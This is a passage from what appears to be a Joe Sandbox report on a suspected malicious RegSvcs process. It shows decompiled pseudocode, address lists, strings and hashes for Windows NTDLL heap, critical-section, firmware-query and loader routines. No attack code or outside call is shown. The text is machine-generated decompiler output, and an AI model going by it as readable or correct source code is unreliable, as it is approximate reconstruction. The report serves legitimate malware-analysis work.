					return _t31;
				}
			}

0x00fdb8f0
0x00fdb8f2
0x00fdb8f4
0x01022c4e
0x01022c50
0x01022c56
0x01022c5c
0x01022c60
0x01022c7f
0x01022c84
0x01022c62
0x01022c77
0x01022c7c
0x01022c8a
0x01022c8f
0x01022c94
0x01022c9c
0x01022ca5
0x01022ca5
0x01022c9c
0x01022c50
0x00fdb8fa
0x00fdb902
0x00fdb921
0x00fdb921
0x00fdb924
0x00fdb924
0x00fdb927
0x00000000
0x00000000
0x00fdb929
0x00fdb92b
0x00fdb92d
0x00fdb940
0x00000000
0x00fdb940
0x00fdb932
0x00fdb932
0x00000000
0x00fdb932
0x00000000
0x00fdb904
0x00fdb904
0x00fdb90a
0x00fdb90c
0x00fdb916
0x00fdb919
0x00fdb915
0x00fdb915
0x00fdb91b
0x00fdb91b
0x00000000
0x00fdb910

Strings

HEAP: , xrefs: 01022C7F
HEAP[%wZ]: , xrefs: 01022C72
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01022C8A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: b237755412d701ce3f0f6bbb30a292f46c36bbb31f1de391de900b3e9eaa0461
Instruction ID: 88d762050404bd4c7a00daa48091b82e2022df1f4952316fef275ab6bc461dc4
Opcode Fuzzy Hash: b237755412d701ce3f0f6bbb30a292f46c36bbb31f1de391de900b3e9eaa0461
Instruction Fuzzy Hash: 1A11E132704141CFDB289A19C4A5B39B3AAEB80721F2A812AE146CB351DB74D841FB46

Uniqueness

Uniqueness Score: -1.00%

Function 0104FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0104FF9A

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0104FF60

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 3446177414-1911121157
Opcode ID: 298e6df35b2384197f97c9f4f8d1f0cffb8ca102ab0140956c98efa085fa53dd
Instruction ID: 2b931c93b88c65ab17325c702ef23406fe1c1718f5cfa2ab7f528024c8110772
Opcode Fuzzy Hash: 298e6df35b2384197f97c9f4f8d1f0cffb8ca102ab0140956c98efa085fa53dd
Instruction Fuzzy Hash: 0F11C4B1910545EFEB62DB98CD89FD8BBF1FF08704F5480A4F5886B1A1C7399940DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0107E539 Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0107E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0107BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0107BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0107AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E00FF9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0107A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0107A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E00FF9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0107A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0107A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E00FD2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E00FCB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E00FCFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E00FD7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0106FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0107e547
0x0107e549
0x0107e54f
0x0107e553
0x0107e557
0x0107e55a
0x0107e55c
0x0107e55f
0x0107e561
0x0107e567
0x0107e56b
0x0107e7e2
0x00000000
0x0107e571
0x0107e575
0x0107e577
0x0107e57b
0x0107e57c
0x0107e57d
0x0107e57e
0x0107e57f
0x0107e588
0x0107e58f
0x0107e591
0x0107e592
0x0107e592
0x0107e596
0x0107e59e
0x0107e5a0
0x0107e5a6
0x0107e61d
0x0107e61d
0x0107e621
0x0107e623
0x0107e630
0x0107e630
0x0107e7e6
0x0107e7eb
0x0107e7ed
0x0107e7f4
0x0107e7fa
0x0107e7ff
0x0107e7ff
0x0107e80a
0x0107e812
0x0107e812
0x0107e5ab
0x0107e5b4
0x0107e5b9
0x0107e5be
0x0107e5c0
0x0107e5c2
0x0107e5c8
0x0107e5c9
0x0107e5cb
0x0107e5cc
0x0107e5d5
0x0107e5e4
0x0107e5f1
0x0107e5f8
0x0107e5f8
0x0107e5d5
0x0107e602
0x0107e616
0x0107e63d
0x0107e644
0x0107e64d
0x0107e652
0x0107e657
0x0107e659
0x0107e65b
0x0107e661
0x0107e662
0x0107e664
0x0107e665
0x0107e66e
0x0107e67d
0x0107e68a
0x0107e691
0x0107e691
0x0107e66e
0x0107e6b0
0x00000000
0x0107e6b6
0x0107e6bd
0x0107e6c7
0x0107e6d7
0x0107e6d9
0x0107e6db
0x0107e6de
0x0107e6e3
0x0107e6f3
0x0107e6fc
0x0107e700
0x0107e700
0x0107e704
0x0107e70a
0x0107e70a
0x0107e713
0x0107e716
0x0107e719
0x0107e720
0x0107e761
0x0107e76b
0x0107e774
0x0107e77a
0x0107e77a
0x0107e78a
0x0107e791
0x0107e799
0x0107e79b
0x0107e79f
0x0107e7aa
0x0107e7c0
0x0107e7ac
0x0107e7b2
0x0107e7b9
0x0107e7b9
0x0107e7c7
0x0107e806
0x00000000
0x0107e7c9
0x0107e7d1
0x0107e7d8
0x00000000
0x0107e7d8
0x00000000
0x00000000
0x0107e722
0x0107e72e
0x0107e748
0x0107e74c
0x0107e754
0x0107e756
0x0107e75c
0x0107e75c
0x00000000
0x0107e75c
0x0107e758
0x0107e758
0x00000000
0x0107e758
0x0107e750
0x00000000
0x00000000
0x0107e752
0x00000000
0x0107e752
0x0107e730
0x0107e735
0x0107e73d
0x0107e73f
0x00000000
0x00000000
0x0107e741
0x0107e741
0x00000000
0x0107e741
0x0107e739
0x00000000
0x00000000
0x0107e73b
0x00000000
0x0107e73b
0x0107e722
0x0107e720
0x0107e6b0
0x0107e618
0x00000000
0x0107e618

Strings

`, xrefs: 0107E670
`, xrefs: 0107E5D7

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: d16d4a8777ce5bc83a4ccc6e60d8dc4f7c7bc311e5d88c6ae1ef5d61ade4f62c
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: DB91B031A053429FE764CE29C841B5BBBE6BF84714F1889ADF6D5CB280E774E804CB55

Uniqueness

Uniqueness Score: -1.00%

Function 010351BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x10905f0);
				E0100D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00FCEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010353CA(0);
						return E0100D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00FFF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00FD3690(1, _t117, 0xf91810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00FFAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00FD4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00FFAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0103500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00FF9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x010351be
0x010351c3
0x010351c8
0x010351cd
0x010351d0
0x010351d3
0x010351d8
0x010351db
0x010351de
0x010351e0
0x010351e3
0x010351e6
0x010351e8
0x01035342
0x01035351
0x01035356
0x0103535a
0x01035360
0x01035363
0x01035366
0x01035369
0x01035369
0x0103536b
0x0103536b
0x01035370
0x010353a3
0x010353a4
0x010353a6
0x010353ab
0x010353ab
0x010353ae
0x010353ae
0x010353b5
0x010353bf
0x010353bf
0x01035375
0x01035396
0x010353a0
0x010353a0
0x00000000
0x01035396
0x01035377
0x01035379
0x0103537f
0x0103538c
0x01035390
0x00000000
0x01035390
0x010351ee
0x010351f1
0x01035301
0x01035310
0x01035315
0x01035318
0x0103531b
0x01035320
0x0103532e
0x01035331
0x00000000
0x01035331
0x01035328
0x01035329
0x00000000
0x01035329
0x010351fa
0x01035235
0x01035236
0x01035239
0x0103523f
0x01035240
0x01035241
0x01035242
0x01035246
0x01035247
0x0103524e
0x01035251
0x01035267
0x01035269
0x0103526e
0x0103527d
0x0103527e
0x01035281
0x01035282
0x01035287
0x01035288
0x0103528a
0x0103528f
0x01035294
0x00000000
0x00000000
0x0103529a
0x0103529c
0x0103529e
0x0103529e
0x010352a4
0x010352b0
0x00000000
0x00000000
0x010352ba
0x010352bc
0x010352bc
0x010352d4
0x010352d9
0x010352dc
0x010352e1
0x00000000
0x00000000
0x010352e7
0x010352f4
0x00000000
0x010352f4
0x01035270
0x00000000
0x01035270
0x010351fc
0x010351fd
0x01035202
0x01035203
0x01035205
0x0103520a
0x0103520f
0x00000000
0x00000000
0x0103521b
0x01035226
0x0103522b
0x0103521d
0x0103521d
0x01035222
0x01035222
0x0103522d
0x00000000

Strings

UEFI, xrefs: 0103521D
Legacy, xrefs: 01035226

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d29642f5bafee38c5eaced28d15c356d1894d3adacd122eb2983a9ac927973b8
Instruction ID: 230616461377e788a4caae1ed22312fac842418fa0f92b763249a070f87e7187
Opcode Fuzzy Hash: d29642f5bafee38c5eaced28d15c356d1894d3adacd122eb2983a9ac927973b8
Instruction Fuzzy Hash: 01513D71A006099FDB25DFA8CD90BADBBF9BF88700F14846DE689EB261D7719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD5E0 Relevance: 1.9, APIs: 1, Instructions: 353
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00FCD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x10ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E00FC6600(0x10a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x10a7b9c; // 0x0
							_t281 = L00FD4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E00FFF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x10a7b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x10a7b8c; // 0xb52a68
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xb52b18
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E00FD2280(_t200, 0x10a84d8);
									_t277 =  *0x10a85f4; // 0xb52f58
									_t351 =  *0x10a85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x74ca0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xb52fa0
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xb52ef0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xb52fa0
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xb532b0
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E00FCFFB0(_t287, _t353, 0x10a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0100CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E00FC6600(0x10a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E00FC7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x10ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0103E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x10a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x10ab218; // 0x0
														asm("ror edi, cl");
														 *0x10ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E00FD2280(_t250, 0x10a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L00FF3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E00FCFFB0(_t293, _t353, 0x10a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E00FF37F5(_t353, 0);
																}
																E00FF0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E00FE9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E00FE02D6(_t174);
																}
																L00FD77F0( *0x10a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E00FEC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L00FCEC7F(_t353);
										L00FE19B8(_t287, 0, _t353, 0);
